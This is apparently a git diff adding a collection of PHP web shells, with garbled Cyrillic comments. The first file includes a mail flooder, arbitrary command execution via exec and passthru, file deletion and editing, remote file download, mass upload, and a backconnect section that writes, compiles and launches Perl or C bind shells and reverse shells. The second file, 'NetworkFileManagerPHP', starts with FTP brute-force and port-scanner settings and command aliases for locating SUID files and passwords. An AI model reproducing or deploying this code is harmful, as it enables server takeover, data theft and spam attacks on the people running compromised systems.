+document.forms[0].elements[0].value="";
+document.forms[0].elements[1].value="";
+document.forms[0].elements[2].value="";
+document.forms[0].elements[3].value="";
+document.forms[0].elements[4].value="";
+}
+//--></script>
+<?php
+if (($email!="" and isset($email)) and ($num!="" and isset($num)) and ($text!="" and isset($text)) and ($kb!="" and isset($kb))) {
+
+$num_text=strlen($text)+1; // ���������� ������ ������ + 1 (������ � �����)
+$num_kb=(1024/$num_text)*$kb;
+$num_kb=ceil($num_kb);
+
+for ($i=1; $i<=$num_kb; $i++) {
+$msg=$msg.$text." ";
+}
+
+for ($i=1; $i<=$num; $i++) {
+mail($email, $text, $msg, "From: $from");
+}
+
+$all_kb=$num*$kb;
+
+echo <<<EOF
+<p align="center">������: <b>$email</b><br>
+���-�� �����: <b>$num</b><br>
+����� ��������� �����: <b>$all_kb kb</b><br></p>
+EOF;
+
+}
+
+else {
+
+echo <<<EOF
+<form action="?ac=mailfluder" method="post">
+<table align="center" border="0" bordercolor="#000000">
+<tr><td>���� ������</td><td><input type="text" name="email" value="to@mail.com" size="25"></td></tr>
+<tr><td>�� ����</td><td><input type="text" name="from" value="sypport@mail.com" size="25"></td></tr>
+<tr><td>����� �����</td><td><input type="text" name="num" value="5" size="25"></td></tr>
+<tr><td>����� �����</td><td><input type="text" name="text" value="fack fack fack" size="25"></td></tr>
+<tr><td>��� ������ (kb)</td><td><input type="text" name="kb" value="10" size="25"></td></tr>
+<tr><td colspan="2" align="center"><input type="submit">&nbsp;&nbsp;<input type="button" onclick="reset_form()" value="Reset"></td></tr>
+</table>
+</form>
+EOF;
+
+}
+break;
+
+case "tar":
+# ��������� ����������
+$fullpath = $d."/".$tar;
+/* ������ ��������� �������� ������ ���������*/
+$CHARS = "abcdefghijklmnopqrstuvwxyz";
+for ($i=0; $i<6; $i++)  $charsname .= $CHARS[rand(0,strlen($CHARS)-1)];
+ echo "<br>
+������� <u><b>$fullpath</b></u>  ".exec("tar -zc $fullpath -f $charsname.tar.gz")."�������� � ���� <u>$charsname.tar.gz</u>";
+
+
+
+echo "
+
+<form action='?ac=tar' method='post'>
+<tr><td align=center colspan=2 class=pagetitle><b>��������� <u>$name.tar.gz</u>:</b></td></tr>
+<tr>
+<td valign=top><input type=text name=archive size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td>
+<td valign=top><input type=submit value='����'></td>
+</tr></form>";
+
+exec($archive);
+
+break;
+
+
+// ���������
+case "navigation":
+ // ����� ���������
+$mymenu = "  [<a href='$php_self?ac=navigation&d=$d&e=$e&delete=1'>�������</a>] [<a href='$php_self?ac=navigation&d=$d&ef=$e&edit=1'>�������������</a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&clean=1'>��������</a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&replace=1'>�������� �����</a>] [<a href='$php_self?ac=navigation&d=$d&download=$e'>���������</a>]  [<a href='$php_self?ac=navigation&d=$d&infofile=$e'>����������</a>]<br>";
+
+$images=array(".gif",".jpg",".png",".bmp",".jpeg");
+$whereme=getcwd();
+@$d=@$_GET['d'];
+$copyr = "<center>";
+$php_self=@$_SERVER['PHP_SELF'];
+if(@eregi("/",$whereme)){$os="unix";}
+if(!isset($d)){$d=$whereme;}
+$d=str_replace("\\","/",$d);
+
+
+
+$expl=explode("/",$d);
+$coun=count($expl);
+if($os=="unix"){echo "<a href='$php_self?ac=navigation&d=/'>/</a>";}
+else{
+        echo "<a href='$php_self?ac=navigation&d=$expl[0]'>$expl[0]/</a>";}
+for($i=1; $i<$coun; $i++){
+        @$xx.=$expl[$i]."/";
+$sls="<a href='$php_self?ac=navigation&d=$expl[0]/$xx'>$expl[$i]</a>/";
+$sls=str_replace("//","/",$sls);
+$sls=str_replace("/'></a>/","/'></a>",$sls);
+print $sls;
+}
+echo "</td></tr>";
+echo "<br><td><b>id:</b> ".@exec('id')."</td></tr";
+
+
+if(@$_GET['deldir']=="1"){
+
+@$dir=$_GET['d'];
+function deldir($d)
+{
+$handle = @opendir($d);
+while (false!==($ff = @readdir($handle))){
+if($ff != "." && $ff != ".."){
+if(@is_dir("$d/$ff")){
+deldir("$d/$ff");
+}else{
+@unlink("$d/$ff");
+}}}
+@closedir($handle);
+if(@rmdir($d)){
+@$success = true;}
+return @$success;
+}
+$dir=@$d;
+deldir($d);
+
+$rback=$_GET['rback'];
+@$rback=explode("/",$rback);
+$crb=count($rback);
+for($i=0; $i<$crb-1; $i++){
+        @$x.=$rback[$i]."/";
+}
+echo "<br><b>������� ������ !</b>";
+echo $copyr;
+exit;}
+if(@$_GET['replace']=="1"){
+$ip=@$_SERVER['REMOTE_ADDR'];
+$d=$_GET['d'];
+$e=$_GET['e'];
+@$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+$e=@$e;
+echo $mymenu ;
+echo "
+�������� ������:<br>
+(�� ����� �������� ����� �����)<br>
+����: $de<br>
+<form method=post>
+1. ���� IP.<br>
+2. microsoft.com IP :)<br>
+�������� ��� <input name=this size=30 value=$ip> ���� <input name=bythis size=30 value=207.46.245.156>
+<input type=submit name=doit value=��������>
+</form>
+";
+
+if(@$_POST['doit']){
+
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$rpl = @fread ($fd, @filesize ($filename));
+$re=str_replace("$this","$bythis",$rpl);
+$x=@fopen("$d/$e","w");
+@fwrite($x,"$re");
+echo "<br><center>$this �������� �� $bythis<br>
+[<a href='$php_self?ac=navigation&d=$d&e=$e'>���������� ����</a>]<br><br><Br>";
+
+}
+echo $copyr;
+exit;}
+
+
+
+
+if(@$_GET['yes']=="yes"){
+$d=@$_GET['d']; $e=@$_GET['e'];
+unlink($d."/".$e);
+$delresult="������ $d/$e �� ����� ! <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?ac=navigation&d=$d\">";
+}
+if(@$_GET['clean']=="1"){
+@$e=$_GET['e'];
+$x=fopen("$d/$e","w");
+fwrite($x,"");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=".@$e."\">";
+exit;
+}
+
+
+if(@$_GET['e']){
+$d=@$_GET['d'];
+$e=@$_GET['e'];
+$pinf=pathinfo($e);
+if(in_array(".".@$pinf['extension'],$images)){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$e&img=1\">";
+exit;}
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+if(is_file($de)){
+if(!is_writable($de)){echo "<font color=red><br><b>������ ������</b></font><br>";}}
+echo $mymenu ;
+echo "
+���������� �����:<br>
+$de
+<br>
+<table width=100% border=1 cellpadding=0 cellspacing=0>
+<tr><td><pre>
+$c
+
+</pre></td></tr>
+</table>";
+if(@$_GET['delete']=="1"){
+$delete=$_GET['delete'];
+echo "
+��������: �� ������ ?<br>
+<a href=\"$php_self?ac=navigation&d=$d&e=$e&delete=".@$delete."&yes=yes\">��</a> || <a href='$php_self?no=1'>���</a>
+<br>
+";
+if(@$_GET['yes']=="yes"){
+@$d=$_GET['d']; @$e=$_GET['e'];
+echo $delresult;
+}
+if(@$_GET['no']){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$e\">
+";
+}
+
+
+} #end of delete
+echo $copyr;
+exit;
+} #end of e
+
+if(@$_GET['edit']=="1"){
+@$d=$_GET['d'];
+@$ef=$_GET['ef'];
+if(is_file($d."/".$ef)){
+if(!is_writable($d."/".$ef)){echo "<font color=red><br><b>������ ������</b></font><br>";}}
+echo $mymenu ;
+$filename="$d/$ef";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$ef;
+$de=str_replace("//","/",$de);
+echo "
+��������������:<br>
+$de<br>
+<form method=post>
+<input type=HIDDEN name=filename value='$d/$ef'>
+<textarea cols=143 rows=30 name=editf>$c</textarea>
+<br>
+<input type=submit name=save value='��������� �������'></form><br>
+
+";
+if(@$_POST['save']){
+$editf=@$_POST['editf'];
+$editf=stripslashes($editf);
+$f=fopen($filename,"w+");
+fwrite($f,"$editf");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$ef\">";
+exit;
+}
+ 
+exit;
+}
+
+
+
+echo"
+<table width=100% cellpadding=1 cellspacing=0 class=hack>
+<a href='?ac=tar&d=$d' title='��������� ���������� ������ ��� ������� ���� ������ � ������� !'><b>[��������� ��������] </b></a>
+<a href='?ac=tar&as=mail&d=$d' title='���������� ��������� �������� + �������� ������ �� ��� e-mail ! �-��� �� �������� � 0.5� ������!'><b>[��������� �������� + �������� �� �-mail] </b></a>
+<a href='?ac=navigation&d=$d&deldir=1' title='������ �������� �������� !\n ���������� ������������� ���� ����� �� ����� :)'><b>[�������� ��������] </b></a>
+<tr><td bgcolor=#4d9ef0><center><b>��������</b></td><td bgcolor=#4d9ef0><b>������</b></td><td bgcolor=#4d9ef0><b>������</b></td></tr>
+";
+$dirs=array();
+$files=array();
+$dh = @opendir($d) or die("<table width=100%><tr><td><center>������� �� ���������� ��� ������ � ���� �������� !</center><br>$copyr</td></tr></table>");
+while (!(($file = readdir($dh)) === false)) {
+if ($file=="." || $file=="..") continue;
+if (@is_dir("$d/$file")) {
+      $dirs[]=$file;
+}else{
+      $files[]=$file;
+      }
+   sort($dirs);
+   sort($files);
+
+$fz=@filesize("$d/$file");
+}
+
+function perm($perms){
+if (($perms & 0xC000) == 0xC000) {
+   $info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+   $info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+   $info = '-';
+} elseif (($perms & 0x6000) == 0x6000) {
+   $info = 'b';
+} elseif (($perms & 0x4000) == 0x4000) {
+   $info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+   $info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+   $info = 'p';
+} else {
+   $info = 'u';
+}
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+           (($perms & 0x0800) ? 's' : 'x' ) :
+           (($perms & 0x0800) ? 'S' : '-'));
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+           (($perms & 0x0400) ? 's' : 'x' ) :
+           (($perms & 0x0400) ? 'S' : '-'));
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+           (($perms & 0x0200) ? 't' : 'x' ) :
+           (($perms & 0x0200) ? 'T' : '-'));
+return $info;
+}
+for ($i=0;$i<sizeof($dirs);$i++) {
+   if ($dirs[$i] != "..") {
+
+
+if(is_writable($dirs[$i])){$info="<font color=green><li>&nbsp;W</font>";}
+else{$info="<font color=red><li>&nbsp;R</font>";}
+$perms = @fileperms($d."/".$dirs[$i]);
+$owner = @fileowner($d."/".$dirs[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$dirs[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#aed7ff";}else{$color="#68adf2";}
+$linkd="<a href='$php_self?ac=navigation&d=$d/$dirs[$i]'>$dirs[$i]</a>";
+$linkd=str_replace("//","/",$linkd);
+echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color>$info</td></tr>";
+}
+}
+for ($i=0;$i<sizeof($files);$i++) {
+if(is_writable($files[$i])){$info="<font color=green><li>&nbsp;W</font>";}
+else{$info="<font color=red><li>&nbsp;R</font>";}
+$size=@filesize($d."/".$files[$i]);
+$perms = @fileperms($d."/".$files[$i]);
+$owner = @fileowner($d."/".$files[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$files[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$prava=perm($perms);
+if($i%2){$color="#ccccff";}else{$color="#b0b0ff";}
+
+if ($size < 1024){$siz=$size.' b';
+}else{
+if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
+if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
+if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
+}}}
+echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?ac=navigation&d=$d&e=$files[$i]'title='������ $prava. �������� $owner/$group'>$files[$i]</a></td><td bgcolor=$color>$siz</td><td bgcolor=$color>$prava</td></tr>";
+}
+
+echo "</table></td></tr></table>";
+break;
+// ��������� �������
+case "backconnect":
+echo "<b>��������� ������� / �������� �����</b>";
+echo "<form name=bind method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>������� ���� </b>";
+echo "<input type=text name=port size=15 value=11457>&nbsp;";
+echo "<b>������ ��� ������� </b>";
+echo "<input type=text name=bind_pass size=15 value=nrws>&nbsp;";
+echo "<b>������������ </b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=�������>";
+echo "</font>";
+echo "</form>";
+
+echo "<b>��������� ������� / ����������</b>";
+echo "<form name=back method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>IP-����� </b>";
+echo "<input type=text name=ip size=15 value=127.0.0.1>&nbsp;";
+echo "<b>���� </b>";
+echo "<input type=text name=port size=15 value=31337>&nbsp;";
+echo "<b>������������ </b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=���������>";
+echo "</font>";
+echo "</form>";
+
+
+/* port bind C */
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ $w_file=fopen("/tmp/bd.c","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Error! Can't write in /tmp/bd.c</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($port_bind_bd_c));
+ fclose($w_file);
+ $blah=exec("gcc -o /tmp/bd /tmp/bd.c");
+ unlink("/tmp/bd.c");
+ $bind_string="/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &";
+ $blah=exec($bind_string);
+ $_POST['cmd']="ps -aux | grep bd";
+ $err=0;
+ }
+}
+
+/* port bind Perl */
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ $w_file=fopen("/tmp/bdpl","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>������! �� ���� �������� � /tmp/</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($port_bind_bd_pl));
+ fclose($w_file);
+ $bind_string="perl /tmp/bdpl ".$_POST['port']." &";
+ $blah=exec($bind_string);
+ $_POST['cmd']="ps -aux | grep bdpl";
+ $err=0;
+ }
+}
+
+/* back connect Perl */
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ $w_file=fopen("/tmp/back","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>������! �� ���� �������� � /tmp/</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($back_connect));
+ fclose($w_file);
+ $bc_string="perl /tmp/back ".$_POST['ip']." ".$_POST['port']." &";
+ $blah=exec($bc_string);
+ $_POST['cmd']="echo \"������ ������ ����������� � ".$_POST['ip']." port ".$_POST['port']." ...\"";
+ $err=0;
+ }
+}
+
+/* back connect C */
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ $w_file=fopen("/tmp/back.c","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Error! Can't write in /tmp/back.c</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($back_connect_c));
+ fclose($w_file);
+ $blah=exec("gcc -o /tmp/backc /tmp/back.c");
+ unlink("/tmp/back.c");
+ $bc_string="/tmp/backc ".$_POST['ip']." ".$_POST['port']." &";
+ $blah=exec($bc_string);
+ $_POST['cmd']="echo \"������ ������ ����������� � ".$_POST['ip']." port ".$_POST['port']." ...\"";
+ $err=0;
+ }
+}
+echo "<font face=Verdana size=-2>����������� �������: <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
+echo "<b>";
+echo "<br>���������: ";
+echo "<font color=red size=2";
+print "".passthru($_POST['cmd'])."";
+echo "</font></b>";
+break;
+
+// Uploading
+case "upload":
+
+echo <<<HTML
+<b>�������� ������</b>
+<a href='$php_self?ac=massupload&d=$d&t=massupload'>* ��������� ������� ���������� ������ *</a><br><br>
+<table>
+<form enctype="multipart/form-data" action="$self" method="POST">
+<input type="hidden" name="ac" value="upload">
+<tr>
+<td>����:</td>
+<td><input size="48" name="file" type="file"></td>
+</tr>
+<tr>
+<td>�����:</td>
+<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="�������"></td><br>
+$tend
+HTML;
+
+if (isset($_POST['path'])){
+
+$uploadfile = $_POST['path'].$_FILES['file']['name'];
+if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
+
+if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
+    echo "���� ������� �������� � ����� $uploadfile\n";
+    echo "���:" .$_FILES['file']['name']. "\n";
+    echo "������:" .$_FILES['file']['size']. "\n";
+
+} else {
+    print "�� ������ ��������� ����. ����:\n";
+    print_r($_FILES);
+}
+}
+
+
+echo "<form enctype='multipart/form-data' action='?ac=upload&status=ok' method=post>
+<b>�������� ������ � ���������� ����������:</b><br>
+ HTTP ���� � �����: <br>
+<input type='text' name='file3' value='http://' size=40><br>
+�������� ����� ��� ���� � ��������� �����: <br>
+<input type='text' name='file2' value='$docr/' size=40><br>
+<input type='submit' value='��������� ����'></form>";
+
+
+if (!isset($status)) downfiles();
+
+else
+{
+
+$data = @implode("", file($file3));
+$fp = @fopen($file2, "wb");
+@fputs($fp, $data);
+$ok = @fclose($fp);
+if($ok)
+{
+$size = filesize($file2)/1024;
+$sizef = sprintf("%.2f", $size);
+
+print "<br><center>�� ���������: <b>���� <u>$file2</u> ��������</b> (".$sizef."��) </center>";
+}
+else
+{
+print "<br><center><font color=red  size = 2><b>������ �������� �����</b></font></center>";
+}
+}
+
+
+
+break;
+// Tools
+case "tools":
+echo "<form method=post>��������� md5 �����<br><input name=md5 size=30></form><br>";
+@$md5=@$_POST['md5'];
+if(@$_POST['md5']){ echo "md5 ������������:<br> ".md5($md5)."";}
+echo "<br>
+<form method=post>�����������/������������� base64<br><input name=base64 size=30></form><br>";
+if(@$_POST['base64']){
+@$base64=$_POST['base64'];
+echo "
+����������:<br><textarea rows=8 cols=80>".base64_encode($base64)."</textarea><br>
+������������: <br><textarea rows=8 cols=80>".base64_decode($base64)."</textarea><br>";}
+echo "<br>
+<form method=post>DES �����������:<br><input name=des size=30></form><br>";
+if(@$_POST['des']){
+@$des=@$_POST['des'];
+echo "Des ������������: <br>".crypt($des)."";}
+echo "<br>
+<form method=post>SHA1 �����������:<br><input name=sha1 size=30></form><br>";
+if(@$_POST['sha1']){
+@$des=@$_POST['sha1'];
+echo "SHA1 ������������: <br>".sha1($sha1a)."";}
+
+echo "<form method=POST>";
+echo "html-��� -> ����������������� ��������<br><input type=text name=data size=30>";
+
+
+if (isset($_POST['data']))
+{
+echo "<br><br><b>���������:<br></b>";
+$str=str_replace("%20","",$_POST['data']);
+for($i=0;$i<strlen($str);$i++)
+{
+$hex=dechex(ord($str[$i]));
+if ($str[$i]=='&') echo "$str[$i]";
+else if ($str[$i]!='\\') echo "%$hex";
+}
+}
+exit;
+break;
+// Mass Uploading
+case "massupload":
+
+
+echo "
+������� �������� ������:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text1 size=43> <input type=file name=text11 size=43><br>
+<input type=file name=text2 size=43> <input type=file name=text12 size=43><br>
+<input type=file name=text3 size=43> <input type=file name=text13 size=43><br>
+<input type=file name=text4 size=43> <input type=file name=text14 size=43><br>
+<input type=file name=text5 size=43> <input type=file name=text15 size=43><br>
+<input type=file name=text6 size=43> <input type=file name=text16 size=43><br>
+<input type=file name=text7 size=43> <input type=file name=text17 size=43><br>
+<input type=file name=text8 size=43> <input type=file name=text18 size=43><br>
+<input type=file name=text9 size=43> <input type=file name=text19 size=43><br>
+<input type=file name=text10 size=43> <input type=file name=text20 size=43><br>
+<input name=where size=43 value='$docr'><br>
+<input type=submit value=��������� name=massupload>
+</form><br>";
+
+if(@$_POST['massupload']){
+$where=@$_POST['where'];
+$uploadfile1 = "$where/".@$_FILES['text1']['name'];
+$uploadfile2 = "$where/".@$_FILES['text2']['name'];
+$uploadfile3 = "$where/".@$_FILES['text3']['name'];
+$uploadfile4 = "$where/".@$_FILES['text4']['name'];
+$uploadfile5 = "$where/".@$_FILES['text5']['name'];
+$uploadfile6 = "$where/".@$_FILES['text6']['name'];
+$uploadfile7 = "$where/".@$_FILES['text7']['name'];
+$uploadfile8 = "$where/".@$_FILES['text8']['name'];
+$uploadfile9 = "$where/".@$_FILES['text9']['name'];
+$uploadfile10 = "$where/".@$_FILES['text10']['name'];
+$uploadfile11 = "$where/".@$_FILES['text11']['name'];
+$uploadfile12 = "$where/".@$_FILES['text12']['name'];
+$uploadfile13 = "$where/".@$_FILES['text13']['name'];
+$uploadfile14 = "$where/".@$_FILES['text14']['name'];
+$uploadfile15 = "$where/".@$_FILES['text15']['name'];
+$uploadfile16 = "$where/".@$_FILES['text16']['name'];
+$uploadfile17 = "$where/".@$_FILES['text17']['name'];
+$uploadfile18 = "$where/".@$_FILES['text18']['name'];
+$uploadfile19 = "$where/".@$_FILES['text19']['name'];
+$uploadfile20 = "$where/".@$_FILES['text20']['name'];
+if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile1</i><br>";}
+if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile2</i><br>";}
+if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile3</i><br>";}
+if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile4</i><br>";}
+if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile5</i><br>";}
+if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile6</i><br>";}
+if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile7</i><br>";}
+if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile8</i><br>";}
+if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile9</i><br>";}
+if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile10</i><br>";}
+if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile11</i><br>";}
+if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile12</i><br>";}
+if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile13</i><br>";}
+if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile14</i><br>";}
+if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile15</i><br>";}
+if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile16</i><br>";}
+if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile17</i><br>";}
+if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile18</i><br>";}
+if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile19</i><br>";}
+if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile20</i><br>";}
+}
+
+exit;
+break;
+case "selfremover":
+ print "<tr><td>";
+print "<font color=red face=verdana size=1>�� ������, ��� ����� ������� ���� ���� � ������� ?<br>
+<a href='$php_self?p=yes'>��, ����</a> | <a href='$php_self?'>���, ����� ��� �������</a><br>
+����� �������: <u>";
+$path=__FILE__;
+print $path;
+print " </u>?</td></tr></table>";
+die;
+}
+
+if($p=="yes"){
+$path=__FILE__;
+@unlink($path);
+$path=str_replace("\\","/",$path);
+if(file_exists($path)){$hmm="���� ���������� �������!!!";
+print "<tr><td><font color=red>���� $path �� ������ !</td></tr>";
+}else{$hmm="������";}
+print "<script>alert('$path $hmm');</script>";
+
+}
+break;
+
+
+?>
+
+
+
diff --git a/xakep-shells/PHP/NetworkFileManagerPHP.php.txt b/xakep-shells/PHP/NetworkFileManagerPHP.php.txt
new file mode 100644
index 0000000..a0cf326
--- /dev/null
+++ b/xakep-shells/PHP/NetworkFileManagerPHP.php.txt
@@ -0,0 +1,5603 @@
+<?
+
+if (ini_get('register_globals') != '1') {
+
+   if (!empty($HTTP_POST_VARS))
+
+    extract($HTTP_POST_VARS);
+
+
+
+  if (!empty($HTTP_GET_VARS))
+
+    extract($HTTP_GET_VARS);
+
+  if (!empty($HTTP_SERVER_VARS))
+
+    extract($HTTP_SERVER_VARS);
+
+}
+
+
+
+$use_md5=0; // Define use of MD5 crypt algoritm //
+
+$uname="1";
+
+$upass="1";
+
+
+
+
+
+
+if ($action != "download" && $action != "view" ):
+
+?>
+
+
+
+<?
+
+
+
+/* Define your email for file send function*/
+
+$demail ="effes2004@gmail.com";
+
+
+
+/* config here */
+
+$title="NetworkFileManagerPHP for channel #hack.ru";
+
+$ver="1.7.private ([final_english_release])";
+
+$sob="Belongs to <b><u>revers</u></b>";
+
+$id="1337";
+
+
+
+/* FTP-bruteforce */
+
+$filename="/etc/passwd";
+
+$ftp_server="localhost";
+
+/* port scanner */
+
+$min="1";
+
+$max="65535";
+
+
+
+/* Aliases */
+
+$aliases=array(
+
+/* find all SUID files */
+
+'find / -type f -perm -04000 -ls' => 'find all suid files'  ,
+
+/* find all SGID files */
+
+'find / -type f -perm -02000 -ls' => 'find all sgid files',
+
+/* find all config.inc.php files */
+
+'find / -type f -name config.inc.php' => 'find all config.inc.php files',
+
+/* find accesseable writeable directories and files*/
+
+'find / -perm -2 -ls' => 'find writeable directories and files',
+
+'ls -la' => 'Current directory listing with rights access',
+
+'find / -name *.php | xargs grep -li password' =>'searsh all file .php word password'
+
+
+
+);
+
+
+
+/* ports and services names */
+
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+
+$port[2] = "Management Utility";
+
+$port[3] = "Compression Process";
+
+$port[5] = "rje (Remote Job Entry)";
+
+$port[7] = "echo";
+
+$port[9] = "discard";
+
+$port[11] = "systat";
+
+$port[13] = "daytime";
+
+$port[15] = "netstat";
+
+$port[17] = "quote of the day";
+
+$port[18] = "send/rwp";
+
+$port[19] = "character generator";
+
+$port[20] = "ftp-data";
+
+$port[21] = "ftp";
+
+$port[22] = "ssh, pcAnywhere";
+
+$port[23] = "Telnet";
+
+$port[25] = "SMTP (Simple Mail Transfer)";
+
+$port[27] = "ETRN (NSW User System FE)";
+
+$port[29] = "MSG ICP";
+
+$port[31] = "MSG Authentication";
+
+$port[33] = "dsp (Display Support Protocol)";
+
+$port[37] = "time";
+
+$port[38] = "RAP (Route Access Protocol)";
+
+$port[39] = "rlp (Resource Location Protocol)";
+
+$port[41] = "Graphics";
+
+$port[42] = "nameserv, WINS";
+
+$port[43] = "whois, nickname";
+
+$port[44] = "MPM FLAGS Protocol";
+
